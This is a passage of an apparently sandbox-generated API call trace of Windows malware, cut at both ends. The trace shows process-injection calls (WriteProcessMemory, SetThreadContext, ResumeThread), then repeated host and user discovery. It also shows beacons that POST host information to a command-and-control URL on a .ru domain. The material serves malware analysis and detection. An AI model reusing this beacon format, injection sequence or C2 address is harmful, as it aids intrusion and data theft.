[488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0164.561] WriteProcessMemory (in: hProcess=0x330, lpBaseAddress=0x7efde008, lpBuffer=0x1afce8*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1afce8*, lpNumberOfBytesWritten=0x0) returned 1 [0164.567] SetThreadContext (hThread=0x328, lpContext=0x1afa0c*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x401480, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0164.567] ResumeThread (hThread=0x328) returned 0x1 [0164.646] GetProcessId (Process=0x330) returned 0xb24 [0164.646] CloseHandle (hObject=0x328) returned 1 [0164.646] CloseHandle (hObject=0x330) returned 1 [0164.646] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x2c40020 | out: hHeap=0x370000) returned 1 [0164.648] Sleep (dwMilliseconds=0xea60) [0174.677] Sleep (dwMilliseconds=0xea60) [0185.752] GetVersion () returned 0x1db10106 [0185.753] GetComputerNameA (in: lpBuffer=0x1ae2d8, nSize=0x1ae3dc | out: lpBuffer="Q9IATRKPRH", nSize=0x1ae3dc) returned 1 [0185.753] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0185.753] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2=" @ " | out: lpString1="Q9IATRKPRH @ ") returned="Q9IATRKPRH @ " [0185.753] K32EnumProcesses (in: lpidProcess=0x1ace98, cb=0x1000, lpcbNeeded=0x1adfa0 | out: lpidProcess=0x1ace98, lpcbNeeded=0x1adfa0) returned 1 [0185.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0185.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0185.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0185.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0185.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x170) returned 0x0 [0185.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0185.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1a4) returned 0x0 [0185.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c8) returned 0x0 [0185.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d0) returned 0x0 [0185.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0185.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0 [0185.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x28c) returned 0x0 [0185.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2bc) returned 0x0 [0185.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x330) returned 0x0 [0185.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x364) returned 0x0 [0185.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f4) returned 0x0 [0185.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x20c) returned 0x0 [0185.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0x330 [0185.759] K32GetProcessImageFileNameA (in: hProcess=0x330, lpImageFileName=0x1acd74, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\System32\\dwm.exe") returned 0x30 [0185.759] CloseHandle (hObject=0x330) returned 1 [0185.760] lstrcpyA (in: lpString1=0x1ade98, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0185.760] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0185.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x458) returned 0x330 [0185.760] K32GetProcessImageFileNameA (in: hProcess=0x330, lpImageFileName=0x1acd74, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\explorer.exe") returned 0x2c [0185.760] CloseHandle (hObject=0x330) returned 1 [0185.760] lstrcpyA (in: lpString1=0x1ade98, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0185.760] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0185.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x458) returned 0x330 [0185.760] OpenProcessToken (in: ProcessHandle=0x330, DesiredAccess=0x20008, TokenHandle=0x1adf8c | out: TokenHandle=0x1adf8c*=0x328) returned 1 [0185.760] GetTokenInformation (in: TokenHandle=0x328, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1adf94 | out: TokenInformation=0x0, ReturnLength=0x1adf94) returned 0 [0185.760] GetLastError () returned 0x7a [0185.760] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x24) returned 0x3faa10 [0185.760] GetTokenInformation (in: TokenHandle=0x328, TokenInformationClass=0x1, TokenInformation=0x3faa10, TokenInformationLength=0x24, ReturnLength=0x1adf94 | out: TokenInformation=0x3faa10, ReturnLength=0x1adf94) returned 1 [0185.760] LookupAccountSidA (in: lpSystemName=0x0, Sid=0x3faa18*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), Name=0x1adfb4, cchName=0x1adfa8, ReferencedDomainName=0x1ae0b8, cchReferencedDomainName=0x1adfb0, peUse=0x1adf7c | out: Name="kEecfMwgj", cchName=0x1adfa8, ReferencedDomainName="Q9IATRKPRH", cchReferencedDomainName=0x1adfb0, peUse=0x1adf7c) returned 1 [0185.763] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3faa10 | out: hHeap=0x370000) returned 1 [0185.763] lstrcpyA (in: lpString1=0x1ae1d4, lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0185.763] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2="\\" | out: lpString1="Q9IATRKPRH\\") returned="Q9IATRKPRH\\" [0185.763] lstrcatA (in: lpString1="Q9IATRKPRH\\", lpString2="kEecfMwgj" | out: lpString1="Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH\\kEecfMwgj" [0185.763] lstrcatA (in: lpString1="Q9IATRKPRH @ ", lpString2="Q9IATRKPRH\\kEecfMwgj" | out: lpString1="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj" [0185.763] lstrcpyA (in: lpString1=0x1afcec, lpString2="94.114.3.195" | out: lpString1="94.114.3.195") returned="94.114.3.195" [0185.764] DsEnumerateDomainTrustsA () returned 0x6b5 [0185.767] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75c50000 [0185.768] GetProcAddress (hModule=0x75c50000, lpProcName="GetNativeSystemInfo") returned 0x75c710b5 [0185.768] GetNativeSystemInfo (in: lpSystemInfo=0x1ae3b8 | out: lpSystemInfo=0x1ae3b8*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0185.768] wsprintfA (in: param_1=0x1ae3ec, param_2="GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)" | out: param_1="GUID=9530500789527912192&BUILD=2405_pin43&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0185.768] lstrlenA (lpString="Content-Type: application/x-www-form-urlencoded") returned 47 [0185.768] lstrlenA (lpString="GUID=9530500789527912192&BUILD=2405_pin43&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0185.769] InternetCrackUrlA (in: lpszUrl="http://euvereginumet.ru/8/forum.php", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x1ae364 | out: lpUrlComponents=0x1ae364) returned 1 [0185.769] InternetConnectA (hInternet=0xcc0004, lpszServerName="euvereginumet.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0185.770] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/8/forum.php", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x277048*="*/*", dwFlags=0x84080100, dwContext=0x0) returned 0xcc000c [0185.770] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x2f, lpOptional=0x1ae3ec*, dwOptionalLength=0x79) returned 1 [0185.849] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x1ae3b8, lpdwBufferLength=0x1ae3a0, lpdwIndex=0x0 | out: lpBuffer=0x1ae3b8*, lpdwBufferLength=0x1ae3a0*=0x4, lpdwIndex=0x0) returned 1 [0185.849] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2470020, dwNumberOfBytesToRead=0xfffff, lpdwNumberOfBytesRead=0x1afd40 | out: lpBuffer=0x2470020*, lpdwNumberOfBytesRead=0x1afd40*=0xc) returned 1 [0185.850] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0185.850] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0185.850] Sleep (dwMilliseconds=0xea60) [0196.595] Sleep (dwMilliseconds=0xea60) [0206.610] GetVersion () returned 0x1db10106 [0206.610] GetComputerNameA (in: lpBuffer=0x1ae2d8, nSize=0x1ae3dc | out: lpBuffer="Q9IATRKPRH", nSize=0x1ae3dc) returned 1 [0206.611] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0206.611] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2=" @ " | out: lpString1="Q9IATRKPRH @ ") returned="Q9IATRKPRH @ " [0206.611] K32EnumProcesses (in: lpidProcess=0x1ace98, cb=0x1000, lpcbNeeded=0x1adfa0 | out: lpidProcess=0x1ace98, lpcbNeeded=0x1adfa0) returned 1 [0206.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0206.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0206.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0206.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0206.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x170) returned 0x0 [0206.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0206.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1a4) returned 0x0 [0206.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c8) returned 0x0 [0206.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d0) returned 0x0 [0206.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0206.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0 [0206.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x28c) returned 0x0 [0206.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2bc) returned 0x0 [0206.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x330) returned 0x0 [0206.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x364) returned 0x0 [0206.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f4) returned 0x0 [0206.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x20c) returned 0x0 [0206.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0x18c [0206.616] K32GetProcessImageFileNameA (in: hProcess=0x18c, lpImageFileName=0x1acd74, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\System32\\dwm.exe") returned 0x30 [0206.616] CloseHandle (hObject=0x18c) returned 1 [0206.617] lstrcpyA (in: lpString1=0x1ade98, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0206.617] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0206.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x458) returned 0x18c [0206.617] K32GetProcessImageFileNameA (in: hProcess=0x18c, lpImageFileName=0x1acd74, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\explorer.exe") returned 0x2c [0206.617] CloseHandle (hObject=0x18c) returned 1 [0206.617] lstrcpyA (in: lpString1=0x1ade98, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0206.617] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0206.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x458) returned 0x18c [0206.617] OpenProcessToken (in: ProcessHandle=0x18c, DesiredAccess=0x20008, TokenHandle=0x1adf8c | out: TokenHandle=0x1adf8c*=0x1b4) returned 1 [0206.617] GetTokenInformation (in: TokenHandle=0x1b4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1adf94 | out: TokenInformation=0x0, ReturnLength=0x1adf94) returned 0 [0206.617] GetLastError () returned 0x7a [0206.617] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x24) returned 0x3faa40 [0206.617] GetTokenInformation (in: TokenHandle=0x1b4, TokenInformationClass=0x1, TokenInformation=0x3faa40, TokenInformationLength=0x24, ReturnLength=0x1adf94 | out: TokenInformation=0x3faa40, ReturnLength=0x1adf94) returned 1 [0206.617] LookupAccountSidA (in: lpSystemName=0x0, Sid=0x3faa48*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), Name=0x1adfb4, cchName=0x1adfa8, ReferencedDomainName=0x1ae0b8, cchReferencedDomainName=0x1adfb0, peUse=0x1adf7c | out: Name="kEecfMwgj", cchName=0x1adfa8, ReferencedDomainName="Q9IATRKPRH", cchReferencedDomainName=0x1adfb0, peUse=0x1adf7c) returned 1 [0206.622] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3faa40 | out: hHeap=0x370000) returned 1 [0206.622] lstrcpyA (in: lpString1=0x1ae1d4, lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0206.622] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2="\\" | out: lpString1="Q9IATRKPRH\\") returned="Q9IATRKPRH\\" [0206.622] lstrcatA (in: lpString1="Q9IATRKPRH\\", lpString2="kEecfMwgj" | out: lpString1="Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH\\kEecfMwgj" [0206.622] lstrcatA (in: lpString1="Q9IATRKPRH @ ", lpString2="Q9IATRKPRH\\kEecfMwgj" | out: lpString1="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj" [0206.622] lstrcpyA (in: lpString1=0x1afcec, lpString2="94.114.3.195" | out: lpString1="94.114.3.195") returned="94.114.3.195" [0206.622] DsEnumerateDomainTrustsA () returned 0x6b5 [0206.628] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75c50000 [0206.628] GetProcAddress (hModule=0x75c50000, lpProcName="GetNativeSystemInfo") returned 0x75c710b5 [0206.628] GetNativeSystemInfo (in: lpSystemInfo=0x1ae3b8 | out: lpSystemInfo=0x1ae3b8*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0206.628] wsprintfA (in: param_1=0x1ae3ec, param_2="GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)" | out: param_1="GUID=9530500789527912192&BUILD=2405_pin43&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0206.628] lstrlenA (lpString="Content-Type: application/x-www-form-urlencoded") returned 47 [0206.628] lstrlenA (lpString="GUID=9530500789527912192&BUILD=2405_pin43&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0206.628] InternetCrackUrlA (in: lpszUrl="http://euvereginumet.ru/8/forum.php", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x1ae364 | out: lpUrlComponents=0x1ae364) returned 1 [0206.629] InternetConnectA (hInternet=0xcc0004, lpszServerName="euvereginumet.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0206.631] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/8/forum.php", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x277048*="*/*", dwFlags=0x84080100, dwContext=0x0) returned 0xcc000c [0206.631] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x2f, lpOptional=0x1ae3ec*, dwOptionalLength=0x79) returned 1 [0206.709] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x1ae3b8, lpdwBufferLength=0x1ae3a0, lpdwIndex=0x0 | out: lpBuffer=0x1ae3b8*, lpdwBufferLength=0x1ae3a0*=0x4, lpdwIndex=0x0) returned 1 [0206.709] InternetReadFile (in: hFile=0xcc000c, 